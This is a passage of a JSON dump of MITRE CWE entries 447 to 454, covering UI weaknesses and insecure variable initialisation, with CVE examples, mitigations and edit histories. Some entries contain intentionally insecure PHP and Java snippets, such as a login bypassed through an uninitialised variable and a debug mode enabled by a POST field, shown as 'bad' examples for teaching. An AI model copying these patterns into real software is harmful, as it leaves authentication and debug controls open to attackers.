implemented.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"671","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Perform functionality testing before deploying the application."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0127","Description":"GUI configuration tool does not enable a security option when a checkbox is selected, although that option is honored when manually set in the configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0127"},{"Reference":"CVE-2001-0863","Description":"Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0863"},{"Reference":"CVE-2001-0865","Description":"Router does not implement a specific keyword when it is used in an ACL, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0865"},{"Reference":"CVE-2004-0979","Description":"Web browser does not properly modify security setting when the user sets it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0979"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unimplemented or unsupported feature in UI"}},"Notes":{"Note":{"#text":"This issue needs more study, as there are not many examples. It is not clear whether it is primary or resultant.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"448":{"attr":{"@_ID":"448","@_Name":"Obsolete Feature in UI","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A UI function is obsolete and the product does not warn the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Remove the obsolete feature from the UI. Warn the user that the feature is no longer supported."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Obsolete feature in UI"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"449":{"attr":{"@_ID":"449","@_Name":"The UI Performs the Wrong Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The UI performs the wrong action with respect to the user\'s request.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"446","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Perform extensive functionality testing of the UI. The UI should behave as specified."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1387","Description":"Network firewall accidentally implements one command line option as if it were another, possibly leading to behavioral infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1387"},{"Reference":"CVE-2001-0081","Description":"Command line option correctly suppresses a user prompt but does not properly disable a feature, although when the product prompts the user, the feature is properly disabled.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0081"},{"Reference":"CVE-2002-1977","Description":"Product does not \\"time out\\" according to user specification, leaving sensitive data available after it has expired.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1977"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"The UI performs the wrong action"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"450":{"attr":{"@_ID":"450","@_Name":"Multiple Interpretations of UI Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"357","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Interpretations of UI Input"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"451":{"attr":{"@_ID":"451","@_Name":"User Interface (UI) Misrepresentation of Critical Information","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.","Extended_Description":{"xhtml:p":["If an attacker can cause the UI to display erroneous data, or to otherwise convince the user to display information that appears to come from a trusted source, then the attacker could trick the user into performing the wrong action. This is often a component in phishing attacks, but other kinds of problems exist. For example, if the UI is used to monitor the security state of a system or network, then omitting or obscuring an important indicator could prevent the user from detecting and reacting to a security-critical event.","UI misrepresentation can take many forms:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Incorrect indicator: incorrect information is displayed, which prevents the user from understanding the true state of the software or the environment the software is monitoring, especially of potentially-dangerous conditions or operations. This can be broken down into several different subtypes.","Overlay: an area of the display is intended to give critical information, but another process can modify the display by overlaying another element on top of it. The user is not interacting with the expected portion of the user interface. This is the problem that enables clickjacking attacks, although many other types of attacks exist that involve overlay.","Icon manipulation: the wrong icon, or the wrong color indicator, can be influenced (such as making a dangerous .EXE executable look like a harmless .GIF)","Timing: the software is performing a state transition or context switch that is presented to the user with an indicator, but a race condition can cause the wrong indicator to be used before the product has fully switched context. The race window could be extended indefinitely if the attacker can trigger an error.","Visual truncation: important information could be truncated from the display, such as a long filename with a dangerous extension that is not displayed in the GUI because the malicious portion is truncated. The use of excessive whitespace can also cause truncation, or place the potentially-dangerous indicator outside of the user\'s field of view (e.g. \\"filename.txt .exe\\"). A different type of truncation can occur when a portion of the information is removed due to reasons other than length, such as the accidental insertion of an end-of-input marker in the middle of an input, such as a NUL byte in a C-style string.","Visual distinction: visual information might be presented in a way that makes it difficult for the user to quickly and correctly distinguish between critical and unimportant segments of the display.","Homographs: letters from different character sets, fonts, or languages can appear very similar (i.e. may be visually equivalent) in a way that causes the human user to misread the text (for example, to conduct phishing attacks to trick a user into visiting a malicious web site with a visually-similar name as a trusted site). This can be regarded as a type of visual distinction issue."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"346","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Hide Activities","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform data validation (e.g. syntax, length, etc.) before interpreting the data."},{"Phase":"Architecture and Design","Strategy":"Output Encoding","Description":"Create a strategy for presenting information, and plan for how to display unusual characters."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2227","Description":"Web browser\'s filename selection dialog only shows the beginning portion of long filenames, which can trick users into launching executables with dangerous extensions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2227"},{"Reference":"CVE-2001-0398","Description":"Attachment with many spaces in filename bypasses \\"dangerous content\\" warning and uses different icon. Likely resultant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0398"},{"Reference":"CVE-2001-0643","Description":"Misrepresentation and equivalence issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0643"},{"Reference":"CVE-2005-0593","Description":"Lock spoofing from several different weaknesses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0593"},{"Reference":"CVE-2004-1104","Description":"Incorrect indicator: web browser can be tricked into presenting the wrong URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1104"},{"Reference":"CVE-2005-0143","Description":"Incorrect indicator: Lock icon displayed when an insecure page loads a binary file loaded from a trusted site.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0143"},{"Reference":"CVE-2005-0144","Description":"Incorrect indicator: Secure \\"lock\\" icon is presented for one channel, while an insecure page is being simultaneously loaded in another channel.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0144"},{"Reference":"CVE-2004-0761","Description":"Incorrect indicator: Certain redirect sequences cause security lock icon to appear in web browser, even when page is not encrypted.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0761"},{"Reference":"CVE-2004-2219","Description":"Incorrect indicator: Spoofing via multi-step attack that causes incorrect information to be displayed in browser address bar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2219"},{"Reference":"CVE-2004-0537","Description":"Overlay: Wide \\"favorites\\" icon can overlay and obscure address bar","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0537"},{"Reference":"CVE-2005-2271","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2271"},{"Reference":"CVE-2005-2272","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2272"},{"Reference":"CVE-2005-2273","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2273"},{"Reference":"CVE-2005-2274","Description":"Visual distinction: Web browsers do not clearly associate a Javascript dialog box with the web page that generated it, allowing spoof of the source of the dialog. \\"origin validation error\\" of a sort?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2274"},{"Reference":"CVE-2001-1410","Description":"Visual distinction: Browser allows attackers to create chromeless windows and spoof victim\'s display using unprotected Javascript method.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1410"},{"Reference":"CVE-2002-0197","Description":"Visual distinction: Chat client allows remote attackers to spoof encrypted, trusted messages with lines that begin with a special sequence, which makes the message appear legitimate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0197"},{"Reference":"CVE-2005-0831","Description":"Visual distinction: Product allows spoofing names of other users by registering with a username containing hex-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0831"},{"Reference":"CVE-2003-1025","Description":"Visual truncation: Special character in URL causes web browser to truncate the user portion of the \\"user@domain\\" URL, hiding real domain in the address bar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1025"},{"Reference":"CVE-2005-0243","Description":"Visual truncation: Chat client does not display long filenames in file dialog boxes, allowing dangerous extensions via manipulations including (1) many spaces and (2) multiple file extensions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0243"},{"Reference":"CVE-2005-1575","Description":"Visual truncation: Web browser file download type can be hidden using whitespace.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1575"},{"Reference":"CVE-2004-2530","Description":"Visual truncation: Visual truncation in chat client using whitespace to hide dangerous file extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2530"},{"Reference":"CVE-2005-0590","Description":"Visual truncation: Dialog box in web browser allows user to spoof the hostname via a long \\"user:pass\\" sequence in the URL, which appears before the real hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0590"},{"Reference":"CVE-2004-1451","Description":"Visual truncation: Null character in URL prevents entire URL from being displayed in web browser.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1451"},{"Reference":"CVE-2004-2258","Description":"Miscellaneous -- [step-based attack, GUI] -- Password-protected tab can be bypassed by switching to another tab, then back to original tab.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2258"},{"Reference":"CVE-2005-1678","Description":"Miscellaneous -- Dangerous file extensions not displayed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1678"},{"Reference":"CVE-2002-0722","Description":"Miscellaneous -- Web browser allows remote attackers to misrepresent the source of a file in the File Download dialog box.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0722"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UI Misrepresentation of Critical Information"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-434","@_Section":"7.16. Foil Semantic Attacks"}}},"Notes":{"Note":[{"#text":"This entry should be broken down into more precise entries. See extended description.","attr":{"@_Type":"Maintenance"}},{"#text":"Misrepresentation problems are frequently studied in web browsers, but there are no known efforts for classifying these kinds of problems in terms of the shortcomings of the interface. In addition, many misrepresentation issues are resultant.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-13","Modification_Importance":"Critical","Modification_Comment":"Defined several different subtypes of this issue."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, Other_Notes, References, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"UI Misrepresentation of Critical Information","attr":{"@_Date":"2014-02-18"}}}},"453":{"attr":{"@_ID":"453","@_Name":"Insecure Default Variable Initialization","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software, by default, initializes an internal variable with an insecure or less secure value than is possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1188","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could gain access to and modify sensitive data or system information."}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Disable or change default settings when they can be used to abuse the system. Since those default settings are shipped with the product they are likely to be known by a potential attacker who is familiar with the product. For instance, default credentials should be changed or the associated accounts should be disabled."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to login a user using credentials from a POST request:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"if (login_user($user,$pass)) {}if ($authorized) {}","xhtml:br":["","","","",""],"xhtml:i":["// $user and $pass automatically set from POST request","..."],"xhtml:div":[{"#text":"$authorized = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"generatePage();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_POST[\'user\'];$pass = $_POST[\'pass\'];$authorized = false;if (login_user($user,$pass)) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"$authorized = true;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"..."}}],"Body_Text":["Because the $authorized variable is never initialized, PHP will automatically set $authorized to any value included in the POST request if register_globals is enabled. An attacker can send a POST request with an unexpected third value \'authorized\' set to \'true\' and gain authorized status without supplying valid credentials.","Here is a fixed version:","This code avoids the issue by initializing the $authorized variable to false and explicitly retrieving the login credentials from the $_POST variable. Regardless, register_globals should never be enabled and is disabled by default in current versions of PHP."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insecure default variable initialization"}},"Notes":{"Note":{"#text":"This overlaps other categories, probably should be split into separate items.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"454":{"attr":{"@_ID":"454","@_Name":"External Initialization of Trusted Variables or Data Stores","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.","Extended_Description":"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. The variables may have been initialized incorrectly. If an attacker can initialize the variable, then they can influence what the vulnerable system will do.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"456","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could gain access to and modify sensitive data or system information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary."},{"Phase":"Architecture and Design","Description":"Avoid any external control of variables. If necessary, restrict the variables that can be modified using an allowlist, and use a different namespace or naming convention if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the Java example below, a system property controls the debug level of the application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"int debugLevel = Integer.getInteger(\\"com.domain.application.debugLevel\\").intValue();"},"Body_Text":"If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases."},{"Intro_Text":"This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$debugEnabled = false;if ($_POST[\\"debug\\"] == \\"true\\"){}function login($username, $password){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"$debugEnabled = 